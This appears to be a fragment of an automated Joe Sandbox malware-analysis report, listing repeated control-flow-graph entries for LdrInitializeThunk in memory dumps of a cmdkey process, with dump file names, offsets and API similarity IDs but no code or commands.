                                                                                      Control-flow Graph
                                                                                      control_flow_graph 147 31b2c30-31b2c3c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph
                                                                                      control_flow_graph 148 31b2c50-31b2c5c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph
                                                                                      control_flow_graph 149 31b2cf0-31b2cfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph
                                                                                      control_flow_graph 134 31b2b2a-31b2b2f 135 31b2b3f-31b2b46 LdrInitializeThunk 134->135 136 31b2b31-31b2b38 134->136
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: true
                                                                                      • Associated: 00000006.00000002.292817455715.0000000003269000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_3140000_cmdkey.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0